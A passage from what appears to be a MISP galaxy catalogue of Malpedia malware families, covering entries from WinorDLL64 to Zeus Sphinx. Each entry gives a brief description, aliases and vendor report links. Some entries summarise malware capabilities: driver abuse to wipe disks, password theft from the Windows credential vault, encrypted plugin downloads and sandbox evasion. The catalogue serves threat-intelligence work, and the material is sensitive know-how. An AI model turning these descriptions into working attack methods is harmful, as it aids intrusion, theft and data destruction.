https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf

https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf

https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf

https://www.youtube.com/watch?v=_fstHQSK-kk

https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf

http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf

https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf

http://web.br.de/interaktiv/winnti/english/

https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive

https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/

https://github.com/superkhung/winnti-sniff

https://securelist.com/apt-trends-report-q3-2020/99204/

https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf

https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/

https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf

WinorDLL64

According to ESET Research, this is a payload downloaded by win.wslink. They attribute it with low confidence to Lazarus.

The tag is: misp-galaxy:malpedia="WinorDLL64"

WinorDLL64 is also known as:

Table 4980. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64

https://www.welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/

WinPot

WinPot is created to make ATMs from a popular ATM vendor automatically dispense all cash from their most valuable cassettes.

The tag is: misp-galaxy:malpedia="WinPot"

WinPot is also known as:

  • ATMPot

Table 4981. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot

https://securelist.com/atm-robber-winpot/89611/

https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/

https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/

WinScreeny

Backdoor used in the EvilPlayout campaign against Iran’s State Broadcaster.

The tag is: misp-galaxy:malpedia="WinScreeny"

WinScreeny is also known as:

Table 4982. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winscreeny

https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/

Wonknu

The tag is: misp-galaxy:malpedia="Wonknu"

Wonknu is also known as:

Table 4987. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

WORMHOLE

WORMHOLE is a TCP tunneler that is dynamically configurable from a C&C server and can communicate with an additional remote machine endpoint for a relay.

The tag is: misp-galaxy:malpedia="WORMHOLE"

WORMHOLE is also known as:

Table 4992. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole

https://securelist.com/lazarus-under-the-hood/77908/

https://content.fireeye.com/apt/rpt-apt38

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

WormLocker

The tag is: misp-galaxy:malpedia="WormLocker"

WormLocker is also known as:

  • WormLckr

Table 4993. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wormlocker

https://twitter.com/Kangxiaopao/status/1355056807924797440

XBot POS

The tag is: misp-galaxy:malpedia="XBot POS"

XBot POS is also known as:

Table 4999. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos

https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html

XBTL

The tag is: misp-galaxy:malpedia="XBTL"

XBTL is also known as:

Table 5000. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl

xCaon

Check Point Research found this backdoor, attributed to IndigoZebra, used to target Afghanistan and other Central Asian countries, including Kyrgyzstan and Uzbekistan, since at least 2014.

The tag is: misp-galaxy:malpedia="xCaon"

xCaon is also known as:

Table 5001. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xcaon

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

XDSpy

According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.

The tag is: misp-galaxy:malpedia="XDSpy"

XDSpy is also known as:

Table 5003. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy

https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/

https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

https://github.com/eset/malware-ioc/tree/master/xdspy/

https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf

XenArmor

XenArmor is a suite of password recovery tools for various applications that have been observed to be abused in attacks alongside malware.

The tag is: misp-galaxy:malpedia="XenArmor"

XenArmor is also known as:

  • XenArmor Suite

Table 5004. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xenarmor

https://xenarmor.com/

Xenon Stealer

The tag is: misp-galaxy:malpedia="Xenon Stealer"

Xenon Stealer is also known as:

Table 5005. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xenon

https://twitter.com/3xp0rtblog/status/1331974232192987142

XiaoBa

Ransomware.

The tag is: misp-galaxy:malpedia="XiaoBa"

XiaoBa is also known as:

  • FlyStudio

Table 5010. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba

https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html

xmrig

According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".

In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.

The tag is: misp-galaxy:malpedia="xmrig"

xmrig is also known as:

Table 5011. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/

https://gridinsoft.com/xmrig

Xorist

According to PCrisk, Xorist is a family of ransomware-type malware. After stealth system infiltration, ransomware from this family encrypts various files stored on the computer. After encrypting the files, this ransomware creates a 'How to Decrypt Files.txt' text file on the victim’s desktop. The file contains a message stating that the files can only be restored by paying a ransom.

The tag is: misp-galaxy:malpedia="Xorist"

Xorist is also known as:

Table 5012. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xorist

https://www.fortinet.com/blog/threat-research/Ransomware-Roundup-New-Inlock-and-Xorist-Variants

XP10

Ransomware.

The tag is: misp-galaxy:malpedia="XP10"

XP10 is also known as:

  • FakeChrome Ransomware

Table 5013. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xp10

https://id-ransomware.blogspot.com/2020/08/xp10-ransomware.html

XpertRAT

According to PCrisk, XpertRAT is a Remote Administration Trojan, a malicious program that allows cyber criminals to remotely access and control infected computers. Typically, users download and install this software inadvertently because they are tricked. By having computers infected with malware such as XpertRAT, users can experience serious problems.

The tag is: misp-galaxy:malpedia="XpertRAT"

XpertRAT is also known as:

Table 5017. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat

https://labs.k7computing.com/?p=15672

https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html

https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration

X-Tunnel (.NET)

This is a rewrite of win.xtunnel using the .NET framework that surfaced in late 2017.

The tag is: misp-galaxy:malpedia="X-Tunnel (.NET)"

X-Tunnel (.NET) is also known as:

Table 5022. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel_net

https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28

Xwo

In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.

The tag is: misp-galaxy:malpedia="Xwo"

Xwo is also known as:

Table 5023. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo

https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner

Yakuza

Ransomware.

The tag is: misp-galaxy:malpedia="Yakuza"

Yakuza is also known as:

  • Teslarvng Ransomware

Table 5027. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware

https://id-ransomware.blogspot.com/2020/03/teslarvng-ransomware.html

Yanluowang

According to PCrisk, Yanluowang is ransomware that encrypts (and renames) files, ends all running processes, stops services, and creates the "README.txt" file containing a ransom note. It appends the ".yanluowang" extension to filenames. Cybercriminals behind Yanluowang are targeting enterprise entities and organizations in the financial sector.

Files encrypted by Yanluowang can be decrypted with this tool (it is possible to decrypt all files if the original file is larger than 3GB. If the original file is smaller than 3GB, then only smaller files can be decrypted).

The tag is: misp-galaxy:malpedia="Yanluowang"

Yanluowang is also known as:

  • Dryxiphia

Table 5029. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://twitter.com/CryptoInsane/status/1586967110504398853

https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html

https://de.darktrace.com/blog/inside-the-yanluowang-leak-organization-members-and-tactics

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware

https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang

https://securelist.com/how-to-recover-files-encrypted-by-yanlouwang/106332/

https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/

https://therecord.media/the-yanluowang-ransomware-group-in-their-own-words/

YaRAT

According to PTSecurity, this RAT uses Yandex Disk as a C2.

The tag is: misp-galaxy:malpedia="YaRAT"

YaRAT is also known as:

Table 5030. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks

Yarraq

Yarraq is a ransomware that encrypts files using asymmetric keys and appends the '.yarraq' extension to filenames. At the time of writing the attacker asks for a $2000 ransom in order to provide a decryptor that enables victims to restore their original files. The email address cyborgyarraq@protonmail.ch is provided for communicating with the attacker.

The tag is: misp-galaxy:malpedia="Yarraq"

Yarraq is also known as:

Table 5031. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq

https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview

https://twitter.com/GrujaRS/status/1210541690349662209

Yasso

According to Palo Alto Networks, Yasso is an open source multi-platform intranet-assisted penetration toolset that brings together a number of features such as scanning, brute forcing, remote interactive shell, and running arbitrary commands. It is authored by a Mandarin-speaking pentester nicknamed Sairson.

The tag is: misp-galaxy:malpedia="Yasso"

Yasso is also known as:

Table 5032. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yasso

https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/

Yatron

The tag is: misp-galaxy:malpedia="Yatron"

Yatron is also known as:

Table 5033. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yatron

https://securelist.com/ransomware-two-pieces-of-good-news/93355/

YoungLotus

Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.

PE timestamps suggest that it came into existence in the second half of 2014.

Some versions check the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY); some versions perform simple AV process checks (CreateToolhelp32Snapshot).

The tag is: misp-galaxy:malpedia="YoungLotus"

YoungLotus is also known as:

  • DarkShare

Table 5038. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus

https://www.youtube.com/watch?v=AUGxYhE_CUY

YourCyanide

According to Trend Micro, this is a ransomware written as a Windows commandline script, with obfuscation applied.

The tag is: misp-galaxy:malpedia="YourCyanide"

YourCyanide is also known as:

  • GonnaCope

  • Kekpop

  • Kekware

Table 5039. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.your_cyanide

https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html

YTStealer

According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it’s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.

The tag is: misp-galaxy:malpedia="YTStealer"

YTStealer is also known as:

Table 5040. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ytstealer

https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

Yunsip

W32/Yunsip!tr.pws is classified as a password-stealing trojan. A password-stealing trojan searches the infected system for passwords and sends them to the attacker.

The tag is: misp-galaxy:malpedia="Yunsip"

Yunsip is also known as:

Table 5042. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.yunsip

https://www.fortiguard.com/encyclopedia/virus/3229143

Z3

Ransomware.

The tag is: misp-galaxy:malpedia="Z3"

Z3 is also known as:

  • Z3enc Ransomware

Table 5043. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.z3

https://id-ransomware.blogspot.com/2020/08/z3-ransomware.html

Zacinlo

Bitdefender describes the primary features of the family as follows: presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercept and decrypt SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and performs browser redirects, potentially manipulating the DOM tree. It also generates traffic in hidden windows, likely for ad fraud. The malware is generally very configurable and internally makes use of Lua scripts.

The tag is: misp-galaxy:malpedia="Zacinlo"

Zacinlo is also known as:

  • s5mark

Table 5044. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zacinlo

https://labs.bitdefender.com/wp-content/uploads/downloads/six-years-and-counting-inside-the-complex-zacinlo-ad-fraud-operation/

Zebrocy

According to Brandefense, Zebrocy is malware that falls into the Trojan category, which the threat actor group APT28/Sofacy has used since 2015. Zebrocy malware consists of 3 main components: Backdoor, Downloader, and Dropper. The Downloader and Dropper are responsible for discovery processes and for downloading the main malware onto the systems. The Backdoor undertakes duties such as persistence in the system, espionage, and data extraction.

This malware, which is not considered new, has variants in many languages from the past to the present. These include programming languages such as Delphi, C#, Visual C++, VB.net, and Golang. Furthermore, we know advanced threat actors and groups revise their malicious software among their toolkits at certain time intervals using different languages and technologies.

The tag is: misp-galaxy:malpedia="Zebrocy"

Zebrocy is also known as:

  • Zekapab

Table 5045. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/

https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/

https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/

https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html

https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

https://meltx0r.github.io/tech/2019/10/24/apt28.html

https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware

https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html

https://securelist.com/zebrocys-multilanguage-malware-salad/90680/

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://research.checkpoint.com/malware-against-the-c-monoculture/

https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/

https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf

https://securelist.com/greyenergys-overlap-with-zebrocy/89506/

https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/

https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/

https://brandefense.io/zebrocy-malware-technical-analysis-report/

https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og

https://securelist.com/a-zebrocy-go-downloader/89419/

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.secureworks.com/research/threat-profiles/iron-twilight

https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/

https://unit42.paloaltonetworks.com/atoms/fighting-ursa/

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html

Zedhou

The tag is: misp-galaxy:malpedia="Zedhou"

Zedhou is also known as:

Table 5047. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou

zenar

The tag is: misp-galaxy:malpedia="zenar"

zenar is also known as:

Table 5048. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar

https://twitter.com/3xp0rtblog/status/1387996083712888832?s=20

Zeoticus

The tag is: misp-galaxy:malpedia="Zeoticus"

Zeoticus is also known as:

Table 5049. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus

https://labs.sentinelone.com/zeoticus-2-0-ransomware-with-no-c2-required/

Zeppelin

Zeppelin is a ransomware written in Delphi and sold as a service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family because of additionally developed modules that make Zeppelin much more configurable than VegaLocker. There are executable variants of type DLL and EXE.

The tag is: misp-galaxy:malpedia="Zeppelin"

Zeppelin is also known as:

Table 5050. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://community.riskiq.com/article/47766fbd

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-223A_Zeppelin_CSA.pdf

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-223a

https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/

https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/

https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team_Zeppelin_Ransomware_Analysis.pdf

https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

ZeroCleare

ZeroCleare is a destructive malware. It was developed to wipe the master boot record section in order to damage a disk's partitioning. The attackers use the EldoS RawDisk driver to perform the malicious action; this driver is not signed and would therefore not be runnable by default. The attackers managed to install it by using a vulnerable version of the VBoxDrv driver, which DSE accepts and runs. It was used to attack Middle East energy and industrial sectors.

The tag is: misp-galaxy:malpedia="ZeroCleare"

ZeroCleare is also known as:

Table 5052. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.ibm.com/downloads/cas/OAJ4VZNJ

https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

ZeroEvil

ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.

It first connects to a gate.php (version=). Upon success, an embedded VBS gets started, connecting to logs_gate.php (plugin=, report=). So far, only one embedded VBS has been observed: it creates and starts a PowerShell script to retrieve all passwords from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes is generated.

The ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).

The tag is: misp-galaxy:malpedia="ZeroEvil"

ZeroEvil is also known as:

Table 5053. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil

https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/

ZeroLocker

The tag is: misp-galaxy:malpedia="ZeroLocker"

ZeroLocker is also known as:

Table 5054. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zerolocker

http://stopmalvertising.com/malware-reports/introduction-to-the-zerolocker-ransomware.html

Zeropadypt

The tag is: misp-galaxy:malpedia="Zeropadypt"

Zeropadypt is also known as:

  • Ouroboros

Table 5055. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeropadypt

https://www.pcrisk.com/removal-guides/16844-harma-ouroboros-ransomware

ZeroT

The tag is: misp-galaxy:malpedia="ZeroT"

ZeroT is also known as:

Table 5056. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot

https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

Zeus

According to CrowdStrike, the two primary goals of the Zeus trojan are stealing people's financial information and adding machines to a botnet. Unlike many types of malware, most Zeus variants try to avoid doing long-term damage to the devices they infect. Their aim is to avoid detection by antivirus software.

The tag is: misp-galaxy:malpedia="Zeus"

Zeus is also known as:

  • Zbot

Table 5057. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus

https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf

http://eternal-todo.com/blog/detecting-zeus

http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html

https://nakedsecurity.sophos.com/2010/07/24/sample-run/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20

https://www.mnin.org/write/ZeusMalware.pdf

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://www.secureworks.com/research/zeus?threat=zeus

https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/

http://eternal-todo.com/blog/zeus-spreading-facebook

http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf

https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/

https://www.crowdstrike.com/cybersecurity-101/malware/trojan-zeus-malware

https://www.wired.com/2017/03/russian-hacker-spy-botnet/

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://www.s21sec.com/en/zeus-the-missing-link/

https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite

https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf

https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://www.secureworks.com/research/threat-profiles/gold-evergreen

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://www.secureworks.com/research/threat-profiles/bronze-woodland

https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://unit42.paloaltonetworks.com/banking-trojan-techniques/

https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/

http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html

http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html

http://eternal-todo.com/blog/new-zeus-binary

http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html

http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html

http://www.secureworks.com/research/threat-profiles/gold-evergreen

http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html

ZeusAction

The tag is: misp-galaxy:malpedia="ZeusAction"

ZeusAction is also known as:

Table 5058. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action

https://twitter.com/benkow_/status/1136983062699487232

https://www.youtube.com/watch?v=EyDiIAtdI

Zeus MailSniffer

The tag is: misp-galaxy:malpedia="Zeus MailSniffer"

Zeus MailSniffer is also known as:

Table 5059. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer

Zeus OpenSSL

This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.

In June 2016, the version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked to it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB. In January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked to it, increasing the size to 1.8 MB. Soon after also in January 2017, with version v1.15.0.0 the code was obfuscated, blowing up the size of the binary to 2.2 MB.

Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

Zeus Sphinx on the one hand has the following versioning ("slow increase"):

  • 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)

  • 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)

  • 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)

Zeus OpenSSL on the other hand has the following versioning ("fast increase"):

  • 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)

  • 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)

  • 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)

The tag is: misp-galaxy:malpedia="Zeus OpenSSL"

Zeus OpenSSL is also known as:

  • XSphinx

Table 5060. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl

https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/

https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/

https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/

Zeus Sphinx

This family describes the vanilla Zeus-variant that includes TOR (and Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9. Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl - the X to refer to IBM X-Force.

Zeus Sphinx on the one hand has the following versioning ("slow increase"):

  • 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)

